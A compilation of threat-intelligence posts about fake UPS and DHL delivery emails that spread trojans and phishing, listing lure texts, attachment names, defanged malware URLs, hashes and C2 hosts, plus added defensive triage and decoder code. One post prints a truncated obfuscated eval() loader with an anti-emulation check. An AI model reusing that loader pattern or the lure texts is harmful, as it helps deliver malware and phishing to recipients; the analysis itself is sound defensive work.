Fake email with subject “UPS Delivery Notification Tracking Number” contains malicious .doc attachment


MX Lab, http://www.mxlab.eu, started to intercept a new trojan distribution campaign by email with the subject “UPS Delivery Notification Tracking Number : XCBMXDI508XCBMXDI866” (the letter/number combination varies with each message).

This email is sent from the spoofed address “UPS Quantum View <auto-notify@ups.com>” and has the following body:

Package delivery confirmation invoice XCBMXDI508XCBMXDI866

Thank you,
United Parcel Service

*** This is an automatically generated email, please do not reply ***
© 2013 United Parcel Service. UPS

The attachment is named invoiceU6GCMXGLL2O0N7QYDZ.doc and is 277 kB in size.

Furthermore, the tracking number in the email is a link to a host from which the same malicious .doc can be downloaded: hxxp://customer.appmys-ups.com/IaPk7PC5bZ/customer.php?h=cHVyY2hhc2luZ0BnaWxiby5iZQ0K. The h= query parameter is a base64-encoded value, which lets the sender tie each click back to the individual recipient.

The trojan is known as EXP/CVE-2012-0158.AQ.1, Exploit.CVE-2012-0158.Gen, Exploit.CVE-2012-0158.Gen (B), Exploit.Win32.CVE-2012-0158.aq, Troj/DocDrop-AT, Trojan.Mdropper or TROJ_GEN.F47V1105.

At the time of writing, 13 of the 47 AV engines at Virus Total detected the trojan.

Virus Total permalink and SHA256: ccf7fed174dc9864c810d1c53b1ba7dfedede41cc9fd2ec82d85ec865ca67db8.
Malwr permalink and SHA256: ccf7fed174dc9864c810d1c53b1ba7dfedede41cc9fd2ec82d85ec865ca67db8.

New fake emails “UPS Delivery Notification Tracking Number” combine 2 techniques to infect a computer


MX Lab, http://www.mxlab.eu, started to intercept a new trojan distribution campaign by email with the subject “UPS Delivery Notification Tracking Number:E76TI8Q77G9OGH2YMB” (the tracking number varies with each message) that combines 2 techniques to infect a computer.

The first technique is simply an .exe attachment. The second starts when the recipient opens the attached HTML page, which prompts them to install a supposedly missing browser plug-in.

The email is sent from the spoofed address “UPS Quantum View <auto-notify@ups.com>” and has the following body:

You have attached the invoice for your package delivery.

Thank you,
United Parcel Service

*** This is an automatically generated email, please do not reply ***

The attached .exe file has the name invoiceE76TI8Q77G9OGH2YMB.PDF.exe (letter/number combination may vary with each message).

The attached HTML file has the name invoiceE76TI8Q77G9OGH2YMB.html (letter/number combination may vary with each message).
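The attachment names in this post (invoice….PDF.exe next to an .html file) and the per-recipient tracking link in the previous post (customer.appmys-ups.com with a base64 h= parameter) are the kind of signals a mail gateway can score without opening the samples. The following is an added example, not MX Lab's code or anything from the campaign: a small set of triage rules run over a constructed message that reuses the attachment names, subject and link host quoted in these posts. The victim address in the link, the archive listing and the rule thresholds are my own constructions.

```javascript
'use strict';

// Added example, not MX Lab's code: mail-gateway triage rules for the
// parcel-themed lures in these posts. The message object below is a
// constructed sample assembled from the attachment names, subject and URL
// quoted in the posts (victim address replaced by example.invalid); the
// rule thresholds are my own.

const EXECUTABLE_EXTS = new Set(['exe', 'scr', 'com', 'pif', 'bat', 'cmd', 'js', 'vbs']);
const ARCHIVE_EXTS = new Set(['zip', 'rar', '7z']);
const DOCUMENT_LOOKALIKES = new Set(['pdf', 'doc', 'docx', 'jpg', 'png', 'txt']);
const BRAND_DOMAINS = { ups: 'ups.com', dhl: 'dhl.com' };
const LURE_SUBJECT = /\b(ups|dhl)\b.*\b(tracking|delivery|parcel)\b/i;

// "invoiceX.PDF.exe" -> ["pdf", "exe"]; "label.zip" -> ["zip"]; "README" -> [].
function extensions(name) {
  const parts = name.toLowerCase().split('.');
  return parts.length > 1 ? parts.slice(1) : [];
}

function isExecutable(name) {
  const exts = extensions(name);
  return exts.length > 0 && EXECUTABLE_EXTS.has(exts[exts.length - 1]);
}

// Attachment findings: direct executables, document-looking double
// extensions (invoice….PDF.exe, ….JPG.exe) and executables inside archives.
function checkAttachment(att) {
  const findings = [];
  const exts = extensions(att.name);
  if (isExecutable(att.name)) {
    findings.push(`executable attachment: ${att.name}`);
    const inner = exts[exts.length - 2];
    if (inner && DOCUMENT_LOOKALIKES.has(inner)) {
      findings.push(`double extension disguises executable as .${inner}: ${att.name}`);
    }
  }
  if (exts.length && ARCHIVE_EXTS.has(exts[exts.length - 1])) {
    for (const member of att.members || []) {
      if (isExecutable(member)) findings.push(`archive ${att.name} contains executable ${member}`);
    }
  }
  return findings;
}

// URL findings: hosts that name a brand without being under its real domain
// (customer.appmys-ups.com, www3apps-myups.com), and query values that are
// base64 of an e-mail address, i.e. a per-recipient click tracker like the
// h= parameter in the first post.
function checkUrl(raw) {
  const findings = [];
  // The posts defang links as hxxp://; restore the scheme so URL() parses it.
  const url = new URL(raw.replace(/^hxxp/i, 'http'));
  const host = url.hostname.toLowerCase();
  for (const [brand, real] of Object.entries(BRAND_DOMAINS)) {
    if (host.includes(brand) && host !== real && !host.endsWith('.' + real)) {
      findings.push(`lookalike ${brand} host: ${host}`);
    }
  }
  // Parse the query by hand: URLSearchParams would turn a base64 '+' into a space.
  for (const pair of url.search.replace(/^\?/, '').split('&')) {
    const i = pair.indexOf('=');
    if (i < 0) continue;
    const key = pair.slice(0, i);
    const value = pair.slice(i + 1);
    if (value.length < 16 || !/^[A-Za-z0-9+/]+={0,2}$/.test(value)) continue;
    const decoded = Buffer.from(value, 'base64').toString('utf8').trim();
    if (/^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(decoded)) {
      findings.push(`query ${key} is base64 of recipient address ${decoded}`);
    }
  }
  return findings;
}

// Verdict: any attachment or URL finding quarantines; a parcel-themed
// subject alone only tags the message, because genuine carrier mail matches it.
function triage(msg) {
  const findings = [];
  for (const att of msg.attachments || []) findings.push(...checkAttachment(att));
  for (const u of msg.urls || []) findings.push(...checkUrl(u));
  const lure = LURE_SUBJECT.test(msg.subject || '');
  return { lure, findings, verdict: findings.length ? 'quarantine' : 'pass' };
}

// Constructed sample message (the address and archive listing are not real).
const SAMPLE_MESSAGE = {
  subject: 'UPS Delivery Notification Tracking Number:E76TI8Q77G9OGH2YMB',
  attachments: [
    { name: 'invoiceE76TI8Q77G9OGH2YMB.PDF.exe' },
    { name: 'invoiceE76TI8Q77G9OGH2YMB.html' },
    { name: 'UPS_invoice_Nr4593.zip', members: ['UPS_invoice_Nr4593.exe'] },
  ],
  urls: [
    'hxxp://customer.appmys-ups.com/IaPk7PC5bZ/customer.php?h=' +
      Buffer.from('victim@example.invalid\r\n').toString('base64'),
  ],
};

console.log(JSON.stringify(triage(SAMPLE_MESSAGE), null, 2));
```

Run with `node triage.js`. The sample produces five findings (executable, double extension, executable inside the archive, lookalike UPS host, base64 recipient token) and a quarantine verdict, while a genuine www.ups.com tracking link with a plain tracking number produces none.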

Let’s start with the attached .exe file. The trojan is known as Win32/TrojanDownloader.Onkods.G, Trojan-Spy.Zbot or TROJ_GEN.F0D1H0ZHM13.

At the time of writing, 5 of the 46 AV engines at Virus Total detected the trojan.

Virus Total permalink and SHA256: 3600343e88ed906ba83dd123c226b0ab0878d54c88983d3a7e4a0bbf9a1d957c.

The second technique relies on the attached HTML file. Opening it in a browser shows the following screen:

The embedded URL leads to a page that tells the user a required plug-in is missing. Accepting the prompt starts the download of the file JavaJREInstaller.exe.

After the fake download and installation, a new screen asks for the tracking number of the parcel.

Entering one only produces the following on-screen message.

The trojan JavaJREInstaller.exe is known as Trojan/Win32.Fareit, Trojan.PWS.Panda.2977, Win32/Spy.Zbot.AAO, W32/Kryptik.FA!tr, Trojan-Spy.Win32.Zbot.otpl, Artemis!00CE434CF737, Heur.Agent/Gen-WhiteBox, Suspicious.Cloud.5 or Trojan.Win32.ZAccess.bnc (v) and is known to download and request files over the internet.

The process vymeu.exe is created on an infected machine.

Several Windows registry changes are made, and the trojan connects to the host davs.microdnsz.com on TCP port 80.

At the time of writing, 11 of the 46 AV engines at Virus Total detected the trojan.

Virus Total permalink and SHA256: 49608f98944623321de3a8a46fa1e6f90926b6b1a51c9edd173ff1eac669705c.

Phishing emails regarding UPS parcel: UPS: Tracking Number Notification


At MX Lab, http://www.mxlab.eu, the fake UPS tracking or delivery emails we intercept usually carry viruses and trojans as attachments, but today we intercepted phishing emails about a “UPS parcel” instead.

The email is sent from the spoofed address “United Parcel Service <powerhost.giv@ups.com>”, carries the subject “UPS: Tracking Number Notification” and has the following body:

Dear Customer,

Your Parcel has been returned to the UPS office nearest to you.
The reason for the return is as a result of incorrect delivery address information.
Kindly click on the below link to update us with your Mobile Number and in less than (42 hours) an agent will contact you on phone to correct your delivery address to enable delivery of parcel.

To update us with your Mobile Number, please Click Here and enter the below tracking number of Parcel.

Tracking # ( 1Z9575R2P297341747 )

Note: Ensure you enter your correct email information and Mobile Number to enable us reach you on phone.

UPS Logistic Service.
*******************************
Copyright © 1994-2012 United Parcel Service of America, Inc. All rights reserved

The first URL, hxxp://www.simonkagyorgy.hu/wp-content/uploads/2012/02/txt.htm, only redirects to hxxp://www.sarperkara.com/wp-includes/images/crystal/www.ups.com/one-to-one/, where the phishing begins with what appears to be a genuine UPS tracking page. Both paths sit inside WordPress directories (wp-content/uploads, wp-includes), so the phishing kit is hosted on compromised sites rather than on infrastructure registered for the campaign.

After the tracking details are entered, the next screens ask for the email address and password of your UPS account and for your phone number.

UPS Delivery Notification, Tracking Number emails with attached HTML document lead to malware


MX Lab, http://www.mxlab.eu, intercepted a few samples by email with the subject “UPS Delivery Notification, Tracking Number 3A4078A852ED6A84” and an attached HTML document named invoice3A4078A852ED6A84.html that leads to malware.

The email is sent from the spoofed address “UPS Quantum View <auto-notify@ups.com>” and has the following body:

You have attached the invoice for your package delivery.

Thank you,
United Parcel Service

*** This is an automatically generated email, please do not reply ***

The attached HTML file has the name invoice3A4078A852ED6A84.html. Once opened in a browser you get the following on your screen:

The first URL leads to hxxp://www3apps-myups.com/main.php?page=3a4078a852ed6a84, a page containing obfuscated JavaScript (code shortened; the real script is stored in the hidden <b> element as character codes shifted by 18 and is only decoded and eval()ed after two deliberate errors are caught, a crude check that the page is running in a real browser rather than an emulator):

<html><body>
<!-- the real script, stored as comma-separated character codes shifted by +18 -->
<b style="display:none;" id="zaq">118,129,117,135,127,119,____[CODE CUT_BY_MXLAB]____,59,77,143,133,130,126,66,58,59,77</b><script>
e=window["ev"+"a"+"l"]; // eval, reached through a concatenated name to defeat naive string matching
md="a";
a=document.getElementById("zaq").innerHTML["spli"+"t"](","); // the code list as an array
</script><script>
s="";
// two deliberate errors: an undefined identifier, then appendChild() of a string;
// only a real browser throws on both, so an emulator never reaches the decode loop
try{hsdfgbreg=prototype;}catch(asgdshg){try{sadfsd=document.createElement("dd");sadfsd.appendChild(""+sadfsd);}catch(gewher){
for(i=0;i<a.length;i++){
s+=String.fromCharCode(a[i]-18); // undo the +18 shift
}
e(s); // run the reconstructed script
}}
</script></body></html>
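The loader above only needs arithmetic to undo, so there is no reason to let it eval() anything during analysis. The following is an added example, not MX Lab's code or the attacker's: a static decoder that pulls the number list out of the hidden <b id="zaq"> element, subtracts the shift and returns the script as text, plus a URL extractor for IOC triage. Because the post cuts the real number list, the sample page is built from a constructed stand-in script; the redirect it contains is assumed (only the file name follows the post's second URL).

```javascript
'use strict';

// Added example, not MX Lab's code or the attacker's: statically decode the
// hidden <b id="zaq"> payload from the loader shown above instead of letting
// the page eval() it. The real character list is cut in the post, so the
// sample below is built from a constructed stand-in script.

const SHIFT = 18; // the loader computes String.fromCharCode(a[i] - 18)

// Encoder used only to build the constructed sample; the attacker's tooling
// does the equivalent before writing the number list into the page.
function encodePayload(script) {
  return Array.from(script, (ch) => ch.charCodeAt(0) + SHIFT).join(',');
}

// Pull the comma-separated numbers out of the hidden element without a DOM.
function extractCodes(html) {
  const m = html.match(/<b[^>]*\bid=["']zaq["'][^>]*>([\d,\s]*)<\/b>/i);
  if (!m) throw new Error('no <b id="zaq"> payload element in page');
  return m[1].split(',').map((s) => s.trim()).filter((s) => s.length).map(Number);
}

// Reverse the obfuscation: subtract the shift and rebuild the script text.
function decodeCodes(codes) {
  for (const n of codes) {
    if (!Number.isInteger(n) || n < SHIFT) throw new Error(`unexpected code ${n}`);
  }
  return codes.map((n) => String.fromCharCode(n - SHIFT)).join('');
}

function decodeZaq(html) {
  return decodeCodes(extractCodes(html));
}

// Pull http(s)/hxxp(s) URLs out of the decoded script for IOC triage.
function extractUrls(script) {
  return script.match(/h(?:xx|tt)ps?:\/\/[^\s"'<>]+/gi) || [];
}

// Why a static decoder: in a real browser the bare identifier `prototype`
// throws ReferenceError and appendChild("") throws TypeError, so both catch
// blocks run and the payload is eval()ed; an emulator that tolerates either
// call never reaches the decode loop and sees nothing. Decoding the numbers
// directly sidesteps that check.

// Constructed sample: an assumed second-stage redirect to the dropped executable.
const SAMPLE_SCRIPT = 'window.location="hxxp://track.www3apps-myups.com/invoice3A4078A852ED6A84.JPG.exe";';
const SAMPLE_HTML = `<html><body>
<b style="display:none;" id="zaq">${encodePayload(SAMPLE_SCRIPT)}</b><script>
e=window["ev"+"a"+"l"];
</script></body></html>`;

console.log('decoded:', decodeZaq(SAMPLE_HTML));
console.log('urls:', extractUrls(decodeZaq(SAMPLE_HTML)));
```

The decoder can be checked against the six leading numbers the post does show: 118,129,117,135,127,119 minus 18 each gives "docume", the start of a `document` reference, and the trailing 59,77 decodes to ");" which is consistent with the script ending in a call.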

The web page shows the following in Firefox on Mac:

The second URL leads to hxxp://track.www3apps-myups.com/invoice3A4078A852ED6A84.JPG.exe and downloads the file invoice3A4078A852ED6A84.JPG.exe, an executable with a double extension chosen to pass for an image.

The trojan is known as Gen:Variant.Kazy.73569, W32/Kryptik.AB!tr, PWS-Zbot.gen.hv or VirTool:Win32/Obfuscator.XI.

At the time of writing, only 6 of the 42 AV engines at Virus Total detected the trojan.

Virus Total permalink and SHA256: 3d32e5470e02df80ebcbcd4f6d87f2c4a9163e908e8d867aa47c217268ebc310.

New Bredolab trojan variants in DHL and UPS tracking emails


MX Lab intercepted several email messages carrying new Bredolab trojan variants in the traditional style: emails about the tracking of a parcel. We noticed new campaigns in both the DHL and the UPS tracking style and cover them together in this article.

The trojan is known as Trojan.Win32.Bredolab, Trojan-Downloader:W32/Bredolab.WI or TrojanDownloader:Win32/Bredolab.AB.

UPS Tracking Number

The message comes from the spoofed address UPS Manager *** <services@ups.com> (*** stands for a random first name and last name). The subject is UPS Tracking Number 42163829 (the number varies with each email). The body of the email:

Dear customer!

The courier company was not able to deliver your parcel by your address.
Cause: Error in shipping address.

You may pickup the parcel at our post office personaly.

Please attention!
The shipping label is attached to this e-mail.
Print this label to get this package at our post office.

Please do not reply to this e-mail, it is an unmonitored mailbox!

Thank you,
United Parcel Service.

The email contains the archive file UPS_invoice _Nr4593.zip, where the number matches the number in the subject. The archive holds the executable UPS_invoice _Nr4593.exe, 68 kB in size.

The trojan creates the following files on the system (the Internet Security 2010 shortcuts, IS2010.exe and warning.html belong to a rogue antivirus that the downloader installs as its payload):

%Profiles%\LocalService\Application Data\mvhgkr.dat
%AppData%\avdrn.dat
%DesktopDir%\Internet Security 2010.lnk
%StartMenu%\Internet Security 2010.lnk
%Programs%\Startup\rarype32.exe
%ProgramFiles%\InternetSecurity2010\IS2010.exe
%System%\41.exe
%System%\helper32.dll
%System%\smss32.exe
%System%\winlogon32.exe
%System%\warning.html

New processes created on the system:

%System%\smss32.exe
%ProgramFiles%\internetsecurity2010\is2010.exe

Various registry settings are changed, smss32.exe (%System%\smss32.exe) opens TCP port 1054 to listen, and connections are established to the remote hosts 193.104.153.30 on port 80 and 193.104.94.5 on port 4455.

The following URLs are then requested from the remote web servers:

* http://downloadavr40.com/loads.php?code=0001384
* http://downloadavr40.com/dfghfghgfj.dll
* http://downloadavr40.com/cgi-bin/download.pl?code=0001384
* http://testavrdown.com/cgi-bin/get.pl?l=0001384

Virus Total permalink and MD5: 28d798d6021e600101ba68ea87345656. At the time of writing this article, only 10 of the 41 AV engines detected the trojan variant.

DHL Tracking Number

The email comes from the spoofed address Support *** <services@dhl.com> (*** stands for a random first name and last name).

Possible subject formats are:

DHL Delivery Problem NR 98545
DHL International. Get your parcel NR.5269
DHL Customer Services. Get your parcel NR.0961
DHL Express Services. Get your parcel NR.6493
DHL Office. Get your parcel NR.6366
DHL Tracking Number 40834372048

The body of the email:

Hello!

The courier company was not able to deliver your parcel by your address.
Cause: Error in shipping address.

You may pickup the parcel at our post office personaly.

Please attention!
The shipping label is attached to this e-mail.
Print this label to get this package at our post office.

Please do not reply to this e-mail, it is an unmonitored mailbox!

Thank you,
DHL Express Services.

The email contains the archive file DHL_label_Nr2387.zip, which holds the executable DHL_label_Nr2387.exe, 68 kB in size. The numbers in the file name vary.

The following files are created on the system:

%AppData%\avdrn.dat
%Programs%\Startup\rarype32.exe

Virus Total permalink and MD5: 7c874b52eee7196ef96dc8710b957033.
